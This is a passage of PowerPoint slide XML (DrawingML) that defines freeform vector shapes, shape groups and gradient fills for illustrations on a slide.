                      <a:pt x="21" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="109"/>
                      <a:pt x="9" y="137"/>
                      <a:pt x="26" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="135"/>
                      <a:pt x="55" y="129"/>
                      <a:pt x="80" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="122"/>
                      <a:pt x="80" y="122"/>
                      <a:pt x="80" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="120"/>
                      <a:pt x="86" y="120"/>
                      <a:pt x="86" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="118"/>
                      <a:pt x="96" y="116"/>
                      <a:pt x="99" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="108"/>
                      <a:pt x="104" y="102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65"/>
                      <a:pt x="110" y="43"/>
                      <a:pt x="110" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="53"/>
                      <a:pt x="109" y="125"/>
                      <a:pt x="109" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="172"/>
                      <a:pt x="112" y="177"/>
                      <a:pt x="118" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="180"/>
                      <a:pt x="162" y="190"/>
                      <a:pt x="169" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="194"/>
                      <a:pt x="193" y="184"/>
                      <a:pt x="196" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="171"/>
                      <a:pt x="196" y="162"/>
                      <a:pt x="196" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="202" y="158"/>
                      <a:pt x="208" y="157"/>
                      <a:pt x="216" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217" y="155"/>
                      <a:pt x="218" y="154"/>
                      <a:pt x="219" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="225" y="152"/>
                      <a:pt x="229" y="150"/>
                      <a:pt x="232" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="235" y="142"/>
                      <a:pt x="236" y="135"/>
                      <a:pt x="236" y="124"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="235" y="114"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="192" y="75"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="79"/>
                      <a:pt x="194" y="83"/>
                      <a:pt x="194" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="97"/>
                      <a:pt x="197" y="108"/>
                      <a:pt x="200" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="123"/>
                      <a:pt x="197" y="124"/>
                      <a:pt x="196" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="111"/>
                      <a:pt x="195" y="99"/>
                      <a:pt x="194" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="82"/>
                      <a:pt x="193" y="78"/>
                      <a:pt x="192" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="73"/>
                      <a:pt x="192" y="72"/>
                      <a:pt x="192" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="72"/>
                      <a:pt x="192" y="73"/>
                      <a:pt x="192" y="7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accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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72" name="Freeform 2073">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55AE4B9-CD83-4BC7-87A6-D43E761298E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985" y="2524"/>
                <a:ext cx="87" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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73" name="Oval 2074">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C7AF15-11B8-4BF9-AABD-607D082F9FE8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 flipH="1">
                <a:off x="1975" y="2454"/>
                <a:ext cx="105" cy="105"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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74" name="Freeform 2075">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B0049C-E821-4E84-8224-69D06D60850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952" y="2446"/>
                <a:ext cx="128" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 94"/>
                  <a:gd name="T1" fmla="*/ 1 h 50"/>
                  <a:gd name="T2" fmla="*/ 49 w 94"/>
                  <a:gd name="T3" fmla="*/ 1 h 50"/>
                  <a:gd name="T4" fmla="*/ 48 w 94"/>
                  <a:gd name="T5" fmla="*/ 1 h 50"/>
                  <a:gd name="T6" fmla="*/ 44 w 94"/>
                  <a:gd name="T7" fmla="*/ 2 h 50"/>
                  <a:gd name="T8" fmla="*/ 43 w 94"/>
                  <a:gd name="T9" fmla="*/ 3 h 50"/>
                  <a:gd name="T10" fmla="*/ 39 w 94"/>
                  <a:gd name="T11" fmla="*/ 4 h 50"/>
                  <a:gd name="T12" fmla="*/ 39 w 94"/>
                  <a:gd name="T13" fmla="*/ 4 h 50"/>
                  <a:gd name="T14" fmla="*/ 35 w 94"/>
                  <a:gd name="T15" fmla="*/ 6 h 50"/>
                  <a:gd name="T16" fmla="*/ 34 w 94"/>
                  <a:gd name="T17" fmla="*/ 7 h 50"/>
                  <a:gd name="T18" fmla="*/ 31 w 94"/>
                  <a:gd name="T19" fmla="*/ 9 h 50"/>
                  <a:gd name="T20" fmla="*/ 30 w 94"/>
                  <a:gd name="T21" fmla="*/ 10 h 50"/>
                  <a:gd name="T22" fmla="*/ 21 w 94"/>
                  <a:gd name="T23" fmla="*/ 20 h 50"/>
                  <a:gd name="T24" fmla="*/ 21 w 94"/>
                  <a:gd name="T25" fmla="*/ 21 h 50"/>
                  <a:gd name="T26" fmla="*/ 21 w 94"/>
                  <a:gd name="T27" fmla="*/ 21 h 50"/>
                  <a:gd name="T28" fmla="*/ 20 w 94"/>
                  <a:gd name="T29" fmla="*/ 23 h 50"/>
                  <a:gd name="T30" fmla="*/ 20 w 94"/>
                  <a:gd name="T31" fmla="*/ 23 h 50"/>
                  <a:gd name="T32" fmla="*/ 0 w 94"/>
                  <a:gd name="T33" fmla="*/ 35 h 50"/>
                  <a:gd name="T34" fmla="*/ 10 w 94"/>
                  <a:gd name="T35" fmla="*/ 34 h 50"/>
                  <a:gd name="T36" fmla="*/ 16 w 94"/>
                  <a:gd name="T37" fmla="*/ 36 h 50"/>
                  <a:gd name="T38" fmla="*/ 20 w 94"/>
                  <a:gd name="T39" fmla="*/ 37 h 50"/>
                  <a:gd name="T40" fmla="*/ 40 w 94"/>
                  <a:gd name="T41" fmla="*/ 48 h 50"/>
                  <a:gd name="T42" fmla="*/ 57 w 94"/>
                  <a:gd name="T43" fmla="*/ 40 h 50"/>
                  <a:gd name="T44" fmla="*/ 94 w 94"/>
                  <a:gd name="T45" fmla="*/ 34 h 50"/>
                  <a:gd name="T46" fmla="*/ 54 w 94"/>
                  <a:gd name="T4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4" h="50">
                    <a:moveTo>
                      <a:pt x="54" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="1"/>
                      <a:pt x="51" y="1"/>
                      <a:pt x="49" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="1"/>
                      <a:pt x="48" y="1"/>
                      <a:pt x="48" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="2"/>
                      <a:pt x="46" y="2"/>
                      <a:pt x="44" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="2"/>
                      <a:pt x="44" y="2"/>
                      <a:pt x="43" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="3"/>
                      <a:pt x="41" y="3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5" y="6"/>
                      <a:pt x="35" y="7"/>
                      <a:pt x="34" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="7"/>
                      <a:pt x="32" y="8"/>
                      <a:pt x="31" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="9"/>
                      <a:pt x="31" y="9"/>
                      <a:pt x="30" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="13"/>
                      <a:pt x="24" y="16"/>
                      <a:pt x="21" y="20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2"/>
                      <a:pt x="20" y="22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7" y="27"/>
                      <a:pt x="3" y="32"/>
                      <a:pt x="0" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="32"/>
                      <a:pt x="6" y="33"/>
                      <a:pt x="10" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="34"/>
                      <a:pt x="14" y="35"/>
                      <a:pt x="16" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="36"/>
                      <a:pt x="19" y="37"/>
                      <a:pt x="20" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="41"/>
                      <a:pt x="34" y="50"/>
                      <a:pt x="40" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="48"/>
                      <a:pt x="51" y="40"/>
                      <a:pt x="57" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="41"/>
                      <a:pt x="94" y="34"/>
                      <a:pt x="94" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="14"/>
                      <a:pt x="74" y="0"/>
                      <a:pt x="54" y="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accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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275" name="Group 2076">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBB0532-DBB9-419D-A9C4-99FA05F908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23" y="2601"/>
                <a:ext cx="257" cy="202"/>
                <a:chOff x="1315" y="1508"/>
                <a:chExt cx="596" cy="469"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2277" name="Freeform 2077">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532A5AF5-27E2-440C-84F3-DFF2AE8D082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315" y="1508"/>
                  <a:ext cx="596" cy="161"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 904"/>
                    <a:gd name="T1" fmla="*/ 123 h 244"/>
                    <a:gd name="T2" fmla="*/ 451 w 904"/>
                    <a:gd name="T3" fmla="*/ 0 h 244"/>
                    <a:gd name="T4" fmla="*/ 904 w 904"/>
                    <a:gd name="T5" fmla="*/ 123 h 244"/>
                    <a:gd name="T6" fmla="*/ 451 w 904"/>
                    <a:gd name="T7" fmla="*/ 244 h 244"/>
                    <a:gd name="T8" fmla="*/ 0 w 904"/>
                    <a:gd name="T9" fmla="*/ 123 h 2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rgbClr val="FF993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78" name="Freeform 2078">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{257C134E-C285-4E02-8A5E-E32B3154FAB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12" y="1589"/>
                  <a:ext cx="299" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 589 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 121 h 589"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 589"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 468 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 589 h 5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rgbClr val="FF993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79" name="Freeform 2079">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16451E04-C5CE-40C1-98D2-3122DD6E941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315" y="1589"/>
                  <a:ext cx="297" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 468 h 589"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 589 h 589"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 121 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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993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276" name="Freeform 2080">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{904080EF-180F-4513-9AC6-52483278650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994" y="2703"/>
                <a:ext cx="121" cy="72"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 91"/>
                  <a:gd name="T1" fmla="*/ 0 h 54"/>
                  <a:gd name="T2" fmla="*/ 27 w 91"/>
                  <a:gd name="T3" fmla="*/ 14 h 54"/>
                  <a:gd name="T4" fmla="*/ 40 w 91"/>
                  <a:gd name="T5" fmla="*/ 46 h 54"/>
                  <a:gd name="T6" fmla="*/ 91 w 91"/>
                  <a:gd name="T7" fmla="*/ 3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1" h="54">
                    <a:moveTo>
                      <a:pt x="75" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="4"/>
                      <a:pt x="45" y="9"/>
                      <a:pt x="27" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="22"/>
                      <a:pt x="17" y="54"/>
                      <a:pt x="40" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="44"/>
                      <a:pt x="65" y="38"/>
                      <a:pt x="91" y="32"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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683" name="Freeform 1058">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD77FA7D-CE67-42FC-B228-AD22078863D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm flipH="1">
              <a:off x="5656885" y="1714376"/>
              <a:ext cx="3242541" cy="864201"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1908 w 2724"/>
                <a:gd name="T1" fmla="*/ 726 h 726"/>
                <a:gd name="T2" fmla="*/ 2724 w 2724"/>
                <a:gd name="T3" fmla="*/ 504 h 726"/>
                <a:gd name="T4" fmla="*/ 762 w 2724"/>
                <a:gd name="T5" fmla="*/ 0 h 726"/>
                <a:gd name="T6" fmla="*/ 0 w 2724"/>
                <a:gd name="T7" fmla="*/ 216 h 726"/>
                <a:gd name="T8" fmla="*/ 1908 w 2724"/>
                <a:gd name="T9" fmla="*/ 726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4" h="726">
                  <a:moveTo>
                    <a:pt x="1908" y="726"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2724" y="504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1908" y="726"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="9DC2EB">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="9DC2EB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84" name="Freeform 1057">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B949E91-1438-4215-869C-A7538F24E40D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4666506" y="2609527"/>
              <a:ext cx="3242541" cy="864201"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1908 w 2724"/>
                <a:gd name="T1" fmla="*/ 726 h 726"/>
                <a:gd name="T2" fmla="*/ 2724 w 2724"/>
                <a:gd name="T3" fmla="*/ 504 h 726"/>
                <a:gd name="T4" fmla="*/ 762 w 2724"/>
                <a:gd name="T5" fmla="*/ 0 h 726"/>
                <a:gd name="T6" fmla="*/ 0 w 2724"/>
                <a:gd name="T7" fmla="*/ 216 h 726"/>
                <a:gd name="T8" fmla="*/ 1908 w 2724"/>
                <a:gd name="T9" fmla="*/ 726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4" h="726">
                  <a:moveTo>
                    <a:pt x="1908" y="726"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2724" y="504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1908" y="726"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="9DC2EB">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="9DC2EB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85" name="Freeform 1056">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C563279-4AA1-4BB6-930C-AF1050C66AB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2504812" y="2854741"/>
              <a:ext cx="3242541" cy="864201"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1908 w 2724"/>
                <a:gd name="T1" fmla="*/ 726 h 726"/>
                <a:gd name="T2" fmla="*/ 2724 w 2724"/>
                <a:gd name="T3" fmla="*/ 504 h 726"/>
                <a:gd name="T4" fmla="*/ 762 w 2724"/>
                <a:gd name="T5" fmla="*/ 0 h 726"/>
                <a:gd name="T6" fmla="*/ 0 w 2724"/>
                <a:gd name="T7" fmla="*/ 216 h 726"/>
                <a:gd name="T8" fmla="*/ 1908 w 2724"/>
                <a:gd name="T9" fmla="*/ 726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4" h="726">
                  <a:moveTo>
                    <a:pt x="1908" y="726"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2724" y="504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1908" y="726"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="DDDDDD">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="DDDDDD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86" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0900FCF-A09A-474A-91D2-68D399776C7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3932054" y="3209468"/>
              <a:ext cx="1547468" cy="416626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CACACA"/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87" name="Freeform 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F7FB9B7-8439-41C4-A333-5D7690E97FFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4912911" y="2645237"/>
              <a:ext cx="1547468" cy="416626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CACACA"/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88" name="Freeform 393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2ADA9E2-EE78-4B57-A9C8-A910D26F99B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4909339" y="3764176"/>
              <a:ext cx="1547468" cy="416626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CACACA"/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89" name="Group 375">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50FB311C-5F86-465B-867B-A6CBF9E8485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flipH="1">
              <a:off x="4973619" y="3377309"/>
              <a:ext cx="542804" cy="533281"/>
              <a:chOff x="762" y="611"/>
              <a:chExt cx="2797" cy="2753"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2253" name="Freeform 376">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E45B4A-FCF6-4DDD-AFE8-C493A816A8E8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861" y="611"/>
                <a:ext cx="1786" cy="2415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 756"/>
                  <a:gd name="T1" fmla="*/ 46 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 756"/>
                  <a:gd name="T3" fmla="*/ 46 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 756"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 756"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 756"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 502 w 756"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 502 w 756"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 756"/>
                  <a:gd name="T15" fmla="*/ 570 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 756"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 756"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 756"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 756"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 756"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 756"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 756"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 756"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 719 w 756"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 719 w 756"/>
                  <a:gd name="T35" fmla="*/ 217 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 756"/>
                  <a:gd name="T37" fmla="*/ 46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56" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
